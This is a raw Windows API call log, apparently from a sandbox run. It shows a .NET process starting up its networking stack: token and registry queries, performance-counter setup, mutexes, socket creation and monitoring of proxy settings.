	[0891.168] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d5d8 | out: TokenHandle=0x1c89d5d8*=0x3ac) returned 1
	[0891.175] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.176] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d5d8 | out: TokenHandle=0x1c89d5d8*=0x380) returned 1
	[0891.177] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.177] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89dc18 | out: TokenHandle=0x1c89dc18*=0x388) returned 1
	[0891.204] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c89bcd8 | out: phkResult=0x1c89bcd8*=0x38c) returned 0x0
	[0891.204] RegQueryValueExW (in: hKey=0x38c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c89bc5c, lpData=0x0, lpcbData=0x1c89bc58*=0x0 | out: lpType=0x1c89bc5c*=0x1, lpData=0x0, lpcbData=0x1c89bc58*=0xe) returned 0x0
	[0891.204] CoTaskMemAlloc (cb=0x12) returned 0x1b96e2b0
	[0891.204] RegQueryValueExW (in: hKey=0x38c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c89bc2c, lpData=0x1b96e2b0, lpcbData=0x1c89bc28*=0xe | out: lpType=0x1c89bc2c*=0x1, lpData="Client", lpcbData=0x1c89bc28*=0xe) returned 0x0
	[0891.204] CoTaskMemFree (pv=0x1b96e2b0) 
	[0891.204] RegCloseKey (hKey=0x38c) returned 0x0
	[0891.612] CoTaskMemAlloc (cb=0xcd0) returned 0x201a20
	[0891.613] RasEnumConnectionsW (in: param_1=0x201a20, param_2=0x1c89dc6c, param_3=0x1c89dc68 | out: param_1=0x201a20, param_2=0x1c89dc6c, param_3=0x1c89dc68) returned 0x0
	[0891.619] CoTaskMemFree (pv=0x201a20) 
	[0891.627] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c89da78 | out: lpWSAData=0x1c89da78) returned 0
	[0891.635] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3ec
	[0891.641] setsockopt (s=0x3ec, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0891.641] closesocket (s=0x3ec) returned 0
	[0891.641] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3ec
	[0891.644] setsockopt (s=0x3ec, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0891.644] closesocket (s=0x3ec) returned 0
	[0897.404] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.405] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d2f8 | out: TokenHandle=0x1c89d2f8*=0x3ec) returned 1
	[0897.417] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.417] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c89d2f8 | out: TokenHandle=0x1c89d2f8*=0x3f0) returned 1
	[0898.006] GetCurrentProcessId () returned 0xf2c
	[0898.019] CoTaskMemAlloc (cb=0x204) returned 0x23a460
	[0898.019] GetComputerNameW (in: lpBuffer=0x23a460, nSize=0x2f16130 | out: lpBuffer="XDUWTFONO", nSize=0x2f16130) returned 1
	[0898.020] CoTaskMemFree (pv=0x23a460) 
	[0898.021] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c89d7d8 | out: phkResult=0x1c89d7d8*=0x3f4) returned 0x0
	[0898.021] RegQueryValueExW (in: hKey=0x3f4, lpValueName="Library", lpReserved=0x0, lpType=0x1c89d75c, lpData=0x0, lpcbData=0x1c89d758*=0x0 | out: lpType=0x1c89d75c*=0x1, lpData=0x0, lpcbData=0x1c89d758*=0x1c) returned 0x0
	[0898.021] CoTaskMemAlloc (cb=0x20) returned 0x1b96c220
	[0898.021] RegQueryValueExW (in: hKey=0x3f4, lpValueName="Library", lpReserved=0x0, lpType=0x1c89d72c, lpData=0x1b96c220, lpcbData=0x1c89d728*=0x1c | out: lpType=0x1c89d72c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c89d728*=0x1c) returned 0x0
	[0898.021] CoTaskMemFree (pv=0x1b96c220) 
	[0898.021] RegQueryValueExW (in: hKey=0x3f4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c89d75c, lpData=0x0, lpcbData=0x1c89d758*=0x0 | out: lpType=0x1c89d75c*=0x4, lpData=0x0, lpcbData=0x1c89d758*=0x4) returned 0x0
	[0898.022] RegQueryValueExW (in: hKey=0x3f4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c89d760, lpData=0x1c89d75c, lpcbData=0x1c89d758*=0x4 | out: lpType=0x1c89d760*=0x4, lpData=0x1c89d75c*=0x1, lpcbData=0x1c89d758*=0x4) returned 0x0
	[0898.022] RegQueryValueExW (in: hKey=0x3f4, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c89d75c, lpData=0x0, lpcbData=0x1c89d758*=0x0 | out: lpType=0x1c89d75c*=0x4, lpData=0x0, lpcbData=0x1c89d758*=0x4) returned 0x0
	[0898.022] RegQueryValueExW (in: hKey=0x3f4, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c89d760, lpData=0x1c89d75c, lpcbData=0x1c89d758*=0x4 | out: lpType=0x1c89d760*=0x4, lpData=0x1c89d75c*=0x137a, lpcbData=0x1c89d758*=0x4) returned 0x0
	[0898.023] RegCloseKey (hKey=0x3f4) returned 0x0
	[0898.027] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c89d798 | out: phkResult=0x1c89d798*=0x3f4) returned 0x0
	[0898.027] RegQueryValueExW (in: hKey=0x3f4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c89d71c, lpData=0x0, lpcbData=0x1c89d718*=0x0 | out: lpType=0x1c89d71c*=0x4, lpData=0x0, lpcbData=0x1c89d718*=0x4) returned 0x0
	[0898.027] RegQueryValueExW (in: hKey=0x3f4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c89d720, lpData=0x1c89d71c, lpcbData=0x1c89d718*=0x4 | out: lpType=0x1c89d720*=0x4, lpData=0x1c89d71c*=0x3, lpcbData=0x1c89d718*=0x4) returned 0x0
	[0898.027] RegQueryValueExW (in: hKey=0x3f4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c89d71c, lpData=0x0, lpcbData=0x1c89d718*=0x0 | out: lpType=0x1c89d71c*=0x4, lpData=0x0, lpcbData=0x1c89d718*=0x4) returned 0x0
	[0898.027] RegQueryValueExW (in: hKey=0x3f4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c89d720, lpData=0x1c89d71c, lpcbData=0x1c89d718*=0x4 | out: lpType=0x1c89d720*=0x4, lpData=0x1c89d71c*=0x20000, lpcbData=0x1c89d718*=0x4) returned 0x0
	[0898.027] RegQueryValueExW (in: hKey=0x3f4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c89d71c, lpData=0x0, lpcbData=0x1c89d718*=0x0 | out: lpType=0x1c89d71c*=0x3, lpData=0x0, lpcbData=0x1c89d718*=0xaa) returned 0x0
	[0898.027] RegQueryValueExW (in: hKey=0x3f4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c89d71c, lpData=0x2f19420, lpcbData=0x1c89d718*=0xaa | out: lpType=0x1c89d71c*=0x3, lpData=0x2f19420*, lpcbData=0x1c89d718*=0xaa) returned 0x0
	[0898.032] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0898.036] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c89d6d0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0898.037] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3fc
	[0898.040] MapViewOfFile (hFileMappingObject=0x3fc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2870000
	[0898.041] VirtualQuery (in: lpAddress=0x2870000, lpBuffer=0x1c89d6c8, dwLength=0x30 | out: lpBuffer=0x1c89d6c8*(BaseAddress=0x2870000, AllocationBase=0x2870000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0898.042] LocalFree (hMem=0x1ffc40) returned 0x0
	[0898.814] RegCloseKey (hKey=0x3f4) returned 0x0
	[0898.817] GetVersionExW (in: lpVersionInformation=0x1c89c6a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c89c6a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0898.818] GetVersionExW (in: lpVersionInformation=0x1c89c670*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c89c670*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0898.819] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f1a0f0, cbSid=0x1c89d6b0 | out: pSid=0x2f1a0f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c89d6b0) returned 1
	[0898.822] CreateMutexW (lpMutexAttributes=0x2f1a2f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0898.825] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0898.827] GetCurrentProcessId () returned 0xf2c
	[0898.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf2c) returned 0x404
	[0898.829] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c89d5c0, lpExitTime=0x1c89d5b8, lpKernelTime=0x1c89d5b0, lpUserTime=0x1c89d5a8 | out: lpCreationTime=0x1c89d5c0, lpExitTime=0x1c89d5b8, lpKernelTime=0x1c89d5b0, lpUserTime=0x1c89d5a8) returned 1
	[0898.829] CloseHandle (hObject=0x404) returned 1
	[0898.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b8) returned 0x404
	[0898.830] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638 | out: lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638) returned 1
	[0898.830] CloseHandle (hObject=0x404) returned 1
	[0898.830] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x9b8) returned 0x404
	[0898.831] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.831] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.832] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c89d5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c89d5a8*=0x408) returned 1
	[0898.833] CloseHandle (hObject=0x408) returned 1
	[0898.834] CloseHandle (hObject=0x404) returned 1
	[0898.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcb0) returned 0x404
	[0898.834] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638 | out: lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638) returned 1
	[0898.834] CloseHandle (hObject=0x404) returned 1
	[0898.834] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xcb0) returned 0x404
	[0898.834] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.834] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.834] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c89d5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c89d5a8*=0x408) returned 1
	[0898.835] CloseHandle (hObject=0x408) returned 1
	[0898.835] CloseHandle (hObject=0x404) returned 1
	[0898.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf10) returned 0x404
	[0898.835] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638 | out: lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638) returned 1
	[0898.835] CloseHandle (hObject=0x404) returned 1
	[0898.835] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf10) returned 0x404
	[0898.835] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.835] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.836] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c89d5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c89d5a8*=0x408) returned 1
	[0898.836] CloseHandle (hObject=0x408) returned 1
	[0898.836] CloseHandle (hObject=0x404) returned 1
	[0898.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf18) returned 0x404
	[0898.836] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638 | out: lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638) returned 1
	[0898.836] CloseHandle (hObject=0x404) returned 1
	[0898.837] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf18) returned 0x404
	[0898.837] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.837] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.837] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c89d5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c89d5a8*=0x408) returned 1
	[0898.837] CloseHandle (hObject=0x408) returned 1
	[0898.837] CloseHandle (hObject=0x404) returned 1
	[0898.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x404
	[0898.837] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638 | out: lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638) returned 1
	[0898.838] CloseHandle (hObject=0x404) returned 1
	[0898.838] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf64) returned 0x404
	[0898.838] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.838] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.838] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c89d5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c89d5a8*=0x408) returned 1
	[0898.838] CloseHandle (hObject=0x408) returned 1
	[0898.839] CloseHandle (hObject=0x404) returned 1
	[0898.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x404
	[0898.839] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638 | out: lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638) returned 1
	[0898.839] CloseHandle (hObject=0x404) returned 1
	[0898.839] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x404
	[0898.839] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.839] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.839] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c89d5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c89d5a8*=0x408) returned 1
	[0898.840] CloseHandle (hObject=0x408) returned 1
	[0898.840] CloseHandle (hObject=0x404) returned 1
	[0898.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x404
	[0898.840] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638 | out: lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638) returned 1
	[0898.840] CloseHandle (hObject=0x404) returned 1
	[0898.840] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x404
	[0898.840] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.840] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.841] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c89d5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c89d5a8*=0x408) returned 1
	[0898.841] CloseHandle (hObject=0x408) returned 1
	[0898.841] CloseHandle (hObject=0x404) returned 1
	[0898.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x404
	[0898.841] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638 | out: lpCreationTime=0x1c89d650, lpExitTime=0x1c89d648, lpKernelTime=0x1c89d640, lpUserTime=0x1c89d638) returned 1
	[0898.841] CloseHandle (hObject=0x404) returned 1
	[0898.842] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x404
	[0898.842] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.842] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.842] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c89d5a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c89d5a8*=0x408) returned 1
	[0898.842] CloseHandle (hObject=0x408) returned 1
	[0898.842] CloseHandle (hObject=0x404) returned 1
	[0898.844] ReleaseMutex (hMutex=0x3f4) returned 1
	[0898.844] CloseHandle (hObject=0x3f4) returned 1
	[0898.845] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f1b588, cbSid=0x1c89d6b0 | out: pSid=0x2f1b588*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c89d6b0) returned 1
	[0898.845] CreateMutexW (lpMutexAttributes=0x2f1b740, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0898.845] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0898.846] ReleaseMutex (hMutex=0x3f4) returned 1
	[0898.846] CloseHandle (hObject=0x3f4) returned 1
	[0898.846] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f1c3b0, cbSid=0x1c89d6b0 | out: pSid=0x2f1c3b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c89d6b0) returned 1
	[0898.847] CreateMutexW (lpMutexAttributes=0x2f1c568, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0898.847] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0898.847] ReleaseMutex (hMutex=0x3f4) returned 1
	[0898.848] CloseHandle (hObject=0x3f4) returned 1
	[0898.848] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f1d1e8, cbSid=0x1c89d6b0 | out: pSid=0x2f1d1e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c89d6b0) returned 1
	[0898.848] CreateMutexW (lpMutexAttributes=0x2f1d3a0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0898.848] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0898.849] ReleaseMutex (hMutex=0x3f4) returned 1
	[0898.849] CloseHandle (hObject=0x3f4) returned 1
	[0898.849] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f1e018, cbSid=0x1c89d6b0 | out: pSid=0x2f1e018*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c89d6b0) returned 1
	[0898.850] CreateMutexW (lpMutexAttributes=0x2f1e1d0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0898.850] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0898.850] ReleaseMutex (hMutex=0x3f4) returned 1
	[0898.851] CloseHandle (hObject=0x3f4) returned 1
	[0898.853] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f1ee48, cbSid=0x1c89d660 | out: pSid=0x2f1ee48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c89d660) returned 1
	[0898.853] CreateMutexW (lpMutexAttributes=0x2f1f000, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0898.853] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f1fc68, cbSid=0x1c89d660 | out: pSid=0x2f1fc68*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c89d660) returned 1
	[0898.853] CreateMutexW (lpMutexAttributes=0x2f1fe20, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0898.854] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f20a80, cbSid=0x1c89d660 | out: pSid=0x2f20a80*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c89d660) returned 1
	[0898.854] CreateMutexW (lpMutexAttributes=0x2f20c38, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0898.854] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f218a8, cbSid=0x1c89d660 | out: pSid=0x2f218a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c89d660) returned 1
	[0898.854] CreateMutexW (lpMutexAttributes=0x2f21a60, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0898.854] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f226c8, cbSid=0x1c89d660 | out: pSid=0x2f226c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c89d660) returned 1
	[0898.855] CreateMutexW (lpMutexAttributes=0x2f22880, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0898.855] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x404
	[0898.856] ioctlsocket (in: s=0x3f4, cmd=-2147195266, argp=0x1c89dc98 | out: argp=0x1c89dc98) returned 0
	[0898.856] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x408
	[0898.856] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x40c
	[0898.857] ioctlsocket (in: s=0x408, cmd=-2147195266, argp=0x1c89dc98 | out: argp=0x1c89dc98) returned 0
	[0898.857] WSAIoctl (in: s=0x3f4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c89dc10, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c89dc10, lpOverlapped=0x0) returned -1
	[0898.859] CoTaskMemAlloc (cb=0x204) returned 0x23a250
	[0898.859] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x23a250, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0898.859] CoTaskMemFree (pv=0x23a250) 
	[0899.453] WSAEventSelect (s=0x3f4, hEventObject=0x404, lNetworkEvents=512) returned 0
	[0899.453] WSAIoctl (in: s=0x408, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c89dc10, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c89dc10, lpOverlapped=0x0) returned -1
	[0899.453] CoTaskMemAlloc (cb=0x204) returned 0x23a250
	[0899.453] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x23a250, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0899.453] CoTaskMemFree (pv=0x23a250) 
	[0899.453] WSAEventSelect (s=0x408, hEventObject=0x40c, lNetworkEvents=512) returned 0
	[0899.453] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x410
	[0899.454] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x410, param_3=0x3) returned 0x0
	[0899.462] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c89dd50 | out: phkResult=0x1c89dd50*=0x428) returned 0x0
	[0899.464] RegOpenKeyExW (in: hKey=0x428, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c89dc38 | out: phkResult=0x1c89dc38*=0x42c) returned 0x0
	[0899.464] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x430
	[0899.465] RegNotifyChangeKeyValue (hKey=0x42c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x430, fAsynchronous=1) returned 0x0
